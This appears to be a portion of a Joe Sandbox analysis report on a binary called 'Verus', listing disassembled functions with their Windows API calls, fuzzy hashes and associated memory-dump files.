Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread
String ID:
API String ID: 2351996187-0
Opcode ID: 131256faed8f2a0801982cd6ed6b2db2a12022b7e6fb14d1ac1152b4666b239d
Instruction ID: 9d8a4125c8f66446a1a6d649e771f659d77b82fd2514372b819287ed409030a1
Opcode Fuzzy Hash: 131256faed8f2a0801982cd6ed6b2db2a12022b7e6fb14d1ac1152b4666b239d
Instruction Fuzzy Hash: AB01AD322052148F8360DF59E894997F3A8FF98765302867FF85A83614C731F891CB98

Function 00442880 Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004428A8
PtInRect.USER32(?), ref: 004428D4
SetCapture.USER32(?), ref: 004428E4
ReleaseCapture.USER32 ref: 004428F6
InvalidateRect.USER32(?,?,00000001), ref: 00442911

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Rect$Capture$ClientInvalidateRelease
String ID:
API String ID: 3623762516-0
Opcode ID: 511da2a06ffc8cb750f102f9e1ae99801d354106387ea71f5366e6303e096854
Instruction ID: c8915121260fb5a976fd7c0ceee4b8131315fc0d2e8d025e58a92bc6ee9471f3
Opcode Fuzzy Hash: 511da2a06ffc8cb750f102f9e1ae99801d354106387ea71f5366e6303e096854
Instruction Fuzzy Hash: D7118B75604701AFE314CB68CA8896BB7E8EF88A00F400A2DF496C3260E774E904CB65

Function 004430B0 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON

Download Yara Rule

APIs

CreateSolidBrush.GDI32(00DE9A40), ref: 004430DB
LoadBitmapW.USER32(?,000000FB), ref: 00443113
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000000,00000004), ref: 00443124
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00443134
DeleteObject.GDI32(00000000), ref: 0044313B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CreateImageList_$BitmapBrushDeleteLoadMaskedObjectSolid
String ID:
API String ID: 1379135639-0
Opcode ID: 8f968a6691e7dbf43022008305d06f6ee7e62a252956a54ca699cf5c3d9cb907
Instruction ID: 70f55be85a57da70212393e5e9d7e49c947e9e7118b9028a89b87dbe9badc46c
Opcode Fuzzy Hash: 8f968a6691e7dbf43022008305d06f6ee7e62a252956a54ca699cf5c3d9cb907
Instruction Fuzzy Hash: 87113DB1540B409FD3708F7A9998A53FBF4FB48710B004A2EE29AC7650C770A4449B18

Function 004562D0 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

ILClone.SHELL32(?), ref: 004562EC
ILRemoveLastID.SHELL32(00000000), ref: 004562F1
ILFindLastID.SHELL32(?), ref: 00456314
ILClone.SHELL32(00000000), ref: 0045631B
ILFree.SHELL32(00000000,?,00000000,?,00000000,00449B8F,0000113E,?,00000000,00000000), ref: 00456326

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CloneLast$FindFreeRemove
String ID:
API String ID: 2828791492-0
Opcode ID: da0bef591d2b1bcbf34a0b6855dd163e4cfa33c7be36b02196a5add34d109d82
Instruction ID: 1b8298dda7b58f7cce5be54ec2add6ee834411d428d29fd6ea763cbeeec9986b
Opcode Fuzzy Hash: da0bef591d2b1bcbf34a0b6855dd163e4cfa33c7be36b02196a5add34d109d82
Instruction Fuzzy Hash: B6016D732003129BC7209FA9E944B9BF7ECABE8733F91442AE944C3612D73594558B24

Function 00416220 Relevance: 7.5, APIs: 5, Instructions: 47threadCOMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C0000005,00000001,?,?), ref: 00416232
GetCurrentThreadId.KERNEL32 ref: 0041624C
EnterCriticalSection.KERNEL32(?), ref: 00416259
LeaveCriticalSection.KERNEL32(?), ref: 00416269
RaiseException.KERNEL32(C0000005,00000001,00000000,00000000), ref: 00416280

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: CriticalExceptionRaiseSection$CurrentEnterLeaveThread
String ID:
API String ID: 2580436124-0
Opcode ID: 1dc6079f282a75873d1d9b3d82c3c002ecefec9e882817bdc1e573fab9b978ec
Instruction ID: ae54330b7be45a8f92c5f3cc415c586309e0c7fec2c56de01a8a15307f781f52
Opcode Fuzzy Hash: 1dc6079f282a75873d1d9b3d82c3c002ecefec9e882817bdc1e573fab9b978ec
Instruction Fuzzy Hash: 87F03171600311ABD7109F659D89F57F7BCEF94B42F01846EB644E7250C774D8418B69

Function 0049A65F Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0049A66B

Part of subcall function 004973CA: __getptd_noexit.LIBCMT ref: 004973CD
Part of subcall function 004973CA: __amsg_exit.LIBCMT ref: 004973DA

__amsg_exit.LIBCMT ref: 0049A68B
__lock.LIBCMT ref: 0049A69B
InterlockedDecrement.KERNEL32(?), ref: 0049A6B8
InterlockedIncrement.KERNEL32(004F0680), ref: 0049A6E3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 5f0dfb3c6fbf5691e5a4464cef798268bd8836bb2db48dd9905b0d30f4049d47
Instruction ID: b82f02d8a65e69da227f48c40effb8d7417030f0b8bcc0e2885baf2487297166
Opcode Fuzzy Hash: 5f0dfb3c6fbf5691e5a4464cef798268bd8836bb2db48dd9905b0d30f4049d47
Instruction Fuzzy Hash: AA018E32900711ABCF61AB66980576E7F60AF81764F19007BE884A7691CB3C6C61DBDE

Function 0045EB50 Relevance: 7.5, APIs: 5, Instructions: 47windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0045EB57
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0045EB75
SendMessageW.USER32(?,00000401,00000088,00000001), ref: 0045EB8B
SendMessageW.USER32(?,00000401,00000088,00000000), ref: 0045EB9E
SendMessageW.USER32(?,00000401,00000089,00000000), ref: 0045EBB0

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window
String ID:
API String ID: 2326795674-0
Opcode ID: 930467a80aaf6ea09139c4586618775c85a99ecb0003b97fab7693663a48df40
Instruction ID: 7bfd4b6ee495db0b2b9d2e1e05807b656fc3dab994f832a12b7359461e9179a1
Opcode Fuzzy Hash: 930467a80aaf6ea09139c4586618775c85a99ecb0003b97fab7693663a48df40
Instruction Fuzzy Hash: DD018171384300BBE760DB669C82F57B3A9ABD0B01F01880AB341BB2D0CAF5E8418B54

Function 0044AB30 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000021), ref: 0044AB3C
GetWindowLongW.USER32(?,000000EC), ref: 0044AB47
GetSystemMetrics.USER32(0000002E), ref: 0044AB56
GetSystemMetrics.USER32 ref: 0044AB6D
SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 0044AB7E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: System$Metrics$InfoLongParametersWindow
String ID:
API String ID: 72108969-0
Opcode ID: 3b948d754e72fdfbb95a8a62a1cfff71342b55f90febbbb525f2e0ace6769196
Instruction ID: e2b1ee4e021c00be8dbf1e5470e0855583d6d5775dbeb7a572190f55619d2cc5
Opcode Fuzzy Hash: 3b948d754e72fdfbb95a8a62a1cfff71342b55f90febbbb525f2e0ace6769196
Instruction Fuzzy Hash: 43F06D726403009BE360AF69DC18B97BAE4EF88720F15062AE649CB2E0D3B4A441CB59

Function 0044ABA0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000021), ref: 0044ABAC
GetWindowLongW.USER32(?,000000EC), ref: 0044ABB7
GetSystemMetrics.USER32(0000002E), ref: 0044ABC6
GetSystemMetrics.USER32 ref: 0044ABDD
SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 0044ABEE

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: System$Metrics$InfoLongParametersWindow
String ID:
API String ID: 72108969-0
Opcode ID: 49c3483c9ce9581fc11d55c71ece400cfcd3e714b866968ece9d0818748134e8
Instruction ID: 79bf840b3fc18c39c8dd96338f7f042189c30b983ac3c2141e645ae910d8d9cc
Opcode Fuzzy Hash: 49c3483c9ce9581fc11d55c71ece400cfcd3e714b866968ece9d0818748134e8
Instruction Fuzzy Hash: 35F06D712403005FF360EB69DC19B5AB6E4BF88B20F150A2EE68AC66D0E7B4E401CB19

Function 0044B000 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000020), ref: 0044B00C
GetWindowLongW.USER32(?,000000EC), ref: 0044B017
GetSystemMetrics.USER32(0000002D), ref: 0044B026
GetSystemMetrics.USER32 ref: 0044B03D
SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 0044B04E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: System$Metrics$InfoLongParametersWindow
String ID:
API String ID: 72108969-0
Opcode ID: 972fb4927dfd604ddc7077675054742d0917da8c0788a2c2504ff854c428c18e
Instruction ID: b2b8564d4a62a16bf9bbe2b2e78e5ba6cc552043c61ecb1cd5cec251c0efd7d5
Opcode Fuzzy Hash: 972fb4927dfd604ddc7077675054742d0917da8c0788a2c2504ff854c428c18e
Instruction Fuzzy Hash: 87F06D726003009BE360AB69DC59B47BAE4EF88725F15062AE28AC72E1D7B5D841CB58

Function 0044B120 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000020), ref: 0044B12C
GetWindowLongW.USER32(?,000000EC), ref: 0044B137
GetSystemMetrics.USER32(0000002D), ref: 0044B146
GetSystemMetrics.USER32 ref: 0044B15D
SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 0044B16E

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: System$Metrics$InfoLongParametersWindow
String ID:
API String ID: 72108969-0
Opcode ID: afb3b501a1f97a5f32376707acd76a49424ffaa51b43af9d2de2d0e700948479
Instruction ID: 78a9195528475a7110ca903382de861e97c8362ea1d81beed9aa804c47321355
Opcode Fuzzy Hash: afb3b501a1f97a5f32376707acd76a49424ffaa51b43af9d2de2d0e700948479
Instruction Fuzzy Hash: 86F03071200700AFF364EB69DD19F5BB6E4BF88724F150A2EE24AC66D0D7B4E401CB59

Function 00418380 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

std::runtime_error::runtime_error.LIBCPMTD ref: 004183E7
__CxxThrowException@8.LIBCMT ref: 004183FE

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

PIL, xrefs: 004183F6
invalid map/set<T> iterator, xrefs: 004183BB

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::runtime_error::runtime_error
String ID: PIL$invalid map/set<T> iterator
API String ID: 1493993918-951410062
Opcode ID: e2b756d0cc147ad44568d49bd8a72c9bc0babcbc3fb33fa3fd6716c98b322896
Instruction ID: 317b18171d8d5519eadc32119f71bfa746d9f216ef0ac132c73f35d598dd709b
Opcode Fuzzy Hash: e2b756d0cc147ad44568d49bd8a72c9bc0babcbc3fb33fa3fd6716c98b322896
Instruction Fuzzy Hash: 14B1C170509381EFD721CF28C180A96BFE1BF55304F18859EE5894B752EB39EC85CB9A

Function 00418690 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 264COMMON

Download Yara Rule

APIs

std::runtime_error::runtime_error.LIBCPMTD ref: 004186F7
__CxxThrowException@8.LIBCMT ref: 0041870E

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

PIL, xrefs: 00418706
invalid map/set<T> iterator, xrefs: 004186CB

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::runtime_error::runtime_error
String ID: PIL$invalid map/set<T> iterator
API String ID: 1493993918-951410062
Opcode ID: e3a98b76fd034a5e95670496a859fe0f0a19911a18f5b0dffa8892dd6862a9a5
Instruction ID: 9132ab566ef35a27ae96a6217e013e6f1b77f65a52d6148151b1a5a483d7b088
Opcode Fuzzy Hash: e3a98b76fd034a5e95670496a859fe0f0a19911a18f5b0dffa8892dd6862a9a5
Instruction Fuzzy Hash: 94B1CFB0508789DFC711EF24C480A96BFE1BF56304F64859EE4954B752DB38EC84CB9A

Function 0046AB80 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 246COMMON

Download Yara Rule

APIs

std::runtime_error::runtime_error.LIBCPMTD ref: 0046ABE3
__CxxThrowException@8.LIBCMT ref: 0046ABFA

Part of subcall function 00491365: RaiseException.KERNEL32(?,?,00491A41,004024C5,?,?,?,?,00491A41,004024C5,004E76D0,0053A2B8,004024C5,00000000,00000000), ref: 004913A7

Strings

PIL, xrefs: 0046ABF2
invalid map/set<T> iterator, xrefs: 0046ABB7

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowstd::runtime_error::runtime_error
String ID: PIL$invalid map/set<T> iterator
API String ID: 1493993918-951410062
Opcode ID: fce8f19e8c978a9de79749812a19f42c7131478cc8bba1805d719864800aec68
Instruction ID: 329cc0f7050342b88037dd7ef90e1d9c41f46d22670f713ed46154b1254d5bda
Opcode Fuzzy Hash: fce8f19e8c978a9de79749812a19f42c7131478cc8bba1805d719864800aec68
Instruction Fuzzy Hash: 57A1C1B0509B819FC711CF18C190A16BFE1AF59304F18859EE48A5B752E738EC95CF9B

Function 0043123E Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00431253
GetTickCount.KERNEL32 ref: 004312A8

Strings

Warning: Failed to read sector range %u-%u, xrefs: 004312E3
Retry on sector %u failed., xrefs: 00431368

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

